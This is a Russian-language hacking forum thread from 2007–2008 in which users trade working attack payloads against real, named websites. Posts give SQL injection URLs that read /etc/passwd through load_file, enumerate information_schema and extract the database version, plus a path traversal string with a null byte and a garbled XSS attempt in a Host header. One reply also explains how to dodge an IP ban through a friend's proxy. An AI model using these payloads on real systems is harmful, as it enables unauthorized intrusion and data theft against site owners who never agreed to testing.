Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. big_BRAT

    big_BRAT Elder - Старейшина

    Joined:
    23 Dec 2006
    Messages:
    77
    Likes Received:
    64
    Reputations:
    7
    это нормально, у пользователя mysql нет прав на чтение файлов. А ошибку выкидывает потомы что фильтруется кавычка.
    что делать - подбирать таблицу с пользователями и надеятся что пароли подойдут к админке, а лучше ссылку на сайт
     
  2. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    ну это совсем не факт
    смотря каие там "тут числа", мож файла такого просто не существует, timlame, попробуй:
    site.ru/news.php?id=-1+union+select+1,2,load_file(0x2F6574632F706173737764),444,5,6,7,8,9,10/*

    если не увидишь ничего, то или ось винда или файловых привилегий нет скорее второе
     
  3. timlame

    timlame Elder - Старейшина

    Joined:
    19 Nov 2007
    Messages:
    34
    Likes Received:
    5
    Reputations:
    0
    т.е. в случае отсутствия файла load_file() возвращает пустую строчку ?
     
  4. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    и в случае отсутствия файла и в случае если нет файловых привилегий
    ошибка возникает тогда, когда ты в load_file() (при наличии file_priv) передал только имя не существующей директории
     
  5. Welemir

    Welemir Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    229
    Likes Received:
    11
    Reputations:
    -4
    вместо сайт пусь буит www.debilko.ru

    знач,как я понял,должно быть так:

    GET /index.html HTTP/1.1
    Host: debilko<xscript>alert('XSS');</xscript>.ru
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 7.0) PTX
    Accept: text/html, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Connection: Keep-Alive

    йа пробывал и гет и пост. Вообще скажите, код то можно внедрить ?)
     
  6. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    GET /index.html HTTP/1.1
    Host: debilko.ru
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 7.0) PTX
    Accept: text/html, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Connection: Keep-Alive


    так должно быть. А ты вообще что хочешь сделать? Почитай про синтаксис http 1.0. Думаю, поймешь, че за чушь написал.
     
    #666 AFoST, 10 Jan 2008
    Last edited: 10 Jan 2008
  7. Welemir

    Welemir Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    229
    Likes Received:
    11
    Reputations:
    -4
    я хотел через HTTP внедрить на хтмл сайт XSS :p

    Я знаю шо твой запрос пральный,ток xspider написал какуюто Г.мол бага есь и запрос)
     
  8. Welemir

    Welemir Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    229
    Likes Received:
    11
    Reputations:
    -4
    И ещё вопрос. пробывал тут sql- запросы на qwerty.ru

    http://qwerty.ru/news.php?id=9999997999+select+union+null,null

    Если он выдаёт при таком запросе список всех тем,и при ID=1+1; 2+1 не реагирует- баги нету?

    P.S. на запрос or 1=1 выдаёт список всех тем,найденных на серве(без кавычек).С кавычками ашиппко... Рассудите меня :Р
     
  9. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    Какую-то хрень твой спайдер написал =) Чтобы внедрить js-код, надо в параметрах, которые используются скриптом передать в качестве значения js-код. host не является таким параметром. Им может являться refferer или user-agent или другие параметры, кот. используются непосредственно в скрипте.
     
  10. А®ТеS

    А®ТеS Active Member

    Joined:
    25 Nov 2006
    Messages:
    198
    Likes Received:
    193
    Reputations:
    41
    Welemir, нету там инъекции...
     
  11. Welemir

    Welemir Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    229
    Likes Received:
    11
    Reputations:
    -4
    жалось то какая)) пасиб шоп помогли.буду искать на досуге уязвимые страницы для тестоф)
     
  12. Welemir

    Welemir Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    229
    Likes Received:
    11
    Reputations:
    -4
    http://www.dukemednews.org/news/article.php?id=10059+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*

    Народ,объясните кто-нибудь,как подобрать здесь количество столбцов и строк(как было написано).Подбирал строки- пишет ошибки какие-то.Подбирал ещё запросом -10059+order+by+10000,куча ошибок. Чем меньше число после by,тем меньше ошибок,но толку нет.(какое макс количество полей может быть я хз)).
     
  13. Welemir

    Welemir Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    229
    Likes Received:
    11
    Reputations:
    -4
    Упс...строки подобрал:Р
     
  14. beng217

    beng217 New Member

    Joined:
    11 Jan 2008
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    Вазможно ли как либо пробиться., у нас на провайдаре есть внутринный ресурс all.gs.uz
    там выставляют разные новасти из за канфликта по однаму вапросу с админом сайта, на вход в этот сайт по локальной сети меня заблакировали до 23 января и типерь когда я пытаюсь зайти по локальной сети пишет что нельзя зяйти
     
    1 person likes this.
  15. big_BRAT

    big_BRAT Elder - Старейшина

    Joined:
    23 Dec 2006
    Messages:
    77
    Likes Received:
    64
    Reputations:
    7
    Смотря по чём тебя забанили
    1. Логин
    2. IP and/or MAC
    Первое решается ну очень просто, хотя я думаю что тебя банили по второму, так как ты в локалке то я думаю есть вариант со сменой ИП, если такой возможности нет но оч. хочется, то как вариант можешь договорится с другом и поставить у него прокси, и ходить через него.
    пс: если друг вдруг станит не_друг, то заодно сможешь за его счет ходить в инет)))
     
  16. Welemir

    Welemir Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    229
    Likes Received:
    11
    Reputations:
    -4
    Fatal error: main(): Failed opening required 'articles/000117 union select null,null/*/text.htm' (include_path='.:/usr/local/share/pear')

    Кто-нить знает,чё за ошибка такая? бадяга то точно есь: ))(чето пропуть пишет)
     
  17. V1k

    V1k Elder - Старейшина

    Joined:
    1 Feb 2007
    Messages:
    38
    Likes Received:
    32
    Reputations:
    13
    это инклуд или читалка файлов.
    попробуй вместо "union select null,null/*" подставить "../../../../../../../../etc/passwd%00"
    и почитай статьи на эту тему
     
  18. Welemir

    Welemir Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    229
    Likes Received:
    11
    Reputations:
    -4
    http://www.paintball.ru/next.php?id=19+union+select+0,1,2+from+mysql.pb_ta ble/*

    P.S. пробывал users,user---не катит.Или в запросе ошибка,или он блочит от него всё.Но бадяга же должна быть)(
    _________________________________________________________________________

    http://www.happyland-drink.ru/brands.php?id=2+union+select+0,1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28/*

    Та же бредятина--- больше одного поля-ошибка в селекте,меньше на один,тоже ошибка.Знач,прально.И при выборе всей этой байды не показывается ничего: )
     
  19. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    невоткнул где вывод, но есть схема таблес:
    http://www.paintball.ru/next.php?id=19+union+select+0,1,2+from+information_schema.tables/*
    надо просто было подставить нге существующий id.
    вот: 4твёртая версия, дальше уж подбирай.
    http://www.happyland-drink.ru/brands.php?id=-2+union+select+0,version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,%2027,28/*
     
  20. Basurman

    Basurman Elder - Старейшина

    Joined:
    10 Nov 2006
    Messages:
    363
    Likes Received:
    271
    Reputations:
    29
    http://www.paintball.ru/next.php?id=19+or+1=1

    там где чувак с ружом
     
    #680 Basurman, 12 Jan 2008
    Last edited: 12 Jan 2008
Thread Status:
Not open for further replies.